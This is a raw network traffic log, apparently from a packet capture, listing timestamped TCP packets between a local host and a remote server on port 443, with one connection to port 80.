Jul 27, 2024 11:37:19.272640944 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.272825003 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.272888899 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.272936106 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.272969961 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.273004055 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.273004055 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.345580101 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.345658064 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.345736980 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.346040010 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.346062899 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.581449032 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.581507921 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.811009884 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.811225891 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.811620951 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.811638117 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.811817884 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.811825991 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.124947071 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.124989033 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.125015020 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.125044107 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.125050068 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.125050068 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.125087023 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.125101089 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.125210047 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.125210047 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.125210047 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.125211000 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.125272036 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.125329018 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.125745058 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.125806093 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.125825882 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.125888109 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.125905037 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.125969887 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.211241007 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.211433887 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.211468935 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.211524010 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.215025902 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.215104103 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.215147018 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.215204000 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.215219021 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.215276003 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.215290070 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.215347052 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.215358019 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.215409994 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.215423107 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.215480089 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.215492010 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.215550900 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.216037989 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.216098070 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.216114044 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.216170073 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.216186047 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.216242075 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.216258049 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.216317892 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.217113972 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.217180014 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.217200994 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.217283964 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.217297077 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.217350960 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.217363119 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.217417002 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.217428923 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.217483044 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.217494965 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.217547894 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.218041897 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.218100071 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.218123913 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.218179941 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.218347073 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.218399048 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.218426943 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.218488932 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.218885899 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.218935966 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.218967915 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.219022036 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.219048023 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.219091892 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.219130039 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.219178915 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.219212055 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.219264030 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.219746113 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.219799995 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.332881927 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.332982063 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.333029985 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.333086967 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.333091974 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.333122969 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.333162069 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.333189011 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.336729050 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.336802006 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.336831093 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.336895943 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.336922884 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.336986065 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.337023020 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.337090015 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.337104082 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.337126970 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.337168932 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.337168932 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.337203026 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.337268114 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.337284088 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.337327003 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.337335110 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.337357044 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.337392092 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.337414980 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.337441921 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.337507963 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.337522984 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.337580919 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.420262098 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.420356989 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.420396090 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.420452118 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.420527935 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.420581102 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.420622110 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.420682907 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.421084881 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.421158075 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.421173096 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.421219110 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.421226978 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.421271086 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.421442032 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.421504974 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.421737909 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.421801090 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.422159910 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.422231913 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.422581911 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.422651052 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.422888041 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.422954082 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.422970057 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.423027992 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.423270941 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.423327923 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.423563957 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.423625946 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.423937082 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.423998117 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.424405098 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.424472094 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.425096989 CEST	49677	80	192.168.2.8	192.229.211.108
Jul 27, 2024 11:37:20.508337975 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.508522987 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.508546114 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.508579016 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.508613110 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.508641005 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.508658886 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.508728027 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.508755922 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.508826971 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.509099007 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.509165049 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.509196043 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.509260893 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.509280920 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.509346962 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.510699034 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.510772943 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.510804892 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.510871887 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.510905981 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.510971069 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.511190891 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.511254072 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.511291981 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.511354923 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.511380911 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.511444092 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.512032032 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.512052059 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.512099028 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.512121916 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.512140989 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.512198925 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.512223959 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.512279987 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.512870073 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.512937069 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.512996912 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.513041019 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.513071060 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.513086081 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.513133049 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.513816118 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.513869047 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.513889074 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.513912916 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.513947010 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.514661074 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.514700890 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.514738083 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.514755964 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.514785051 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.514802933 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.547812939 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.547905922 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.593235016 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.593322992 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.593355894 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.593384981 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.593411922 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.593441963 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.593549967 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.593611956 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.593815088 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.593874931 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.593890905 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.593946934 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.594233036 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.594295979 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.594312906 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.594374895 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.594965935 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.595041990 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.595048904 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.595066071 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.595112085 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.595112085 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.595365047 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.595427990 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.596050978 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.596121073 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.596139908 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.596190929 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.597023010 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.597099066 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.597115040 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.597165108 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.597822905 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.597871065 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.597903967 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.597917080 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.597944975 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.597971916 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.598550081 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.598586082 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.598618031 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.598637104 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.598659039 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.598784924 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.598824024 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.598840952 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.598864079 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.598886967 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.599140882 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.599209070 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.599222898 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.599266052 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.599550009 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.599613905 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.600065947 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.600100040 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.600133896 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.600153923 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.600178003 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.600209951 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.634716034 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.634783030 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.634820938 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.634862900 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.634891033 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.634913921 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.682198048 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.682260990 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.682292938 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.682306051 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.682320118 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.682344913 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.682382107 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.682436943 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.683355093 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.683393002 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.683450937 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.683470011 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.683495045 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.683495998 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.683518887 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.683533907 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.683557034 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.683574915 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.683578968 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.683599949 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.683640003 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.683665991 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.683681965 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.683732986 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.684166908 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.684246063 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.684257984 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.684279919 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.684307098 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.684325933 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.684348106 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.684359074 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.684367895 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.684385061 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.684411049 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.684432030 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.684818983 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.684892893 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.684906006 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.684928894 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.684950113 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.684962988 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.684988022 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.685008049 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.685012102 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.685035944 CEST	443	49708	104.21.65.79	192.168.2.8
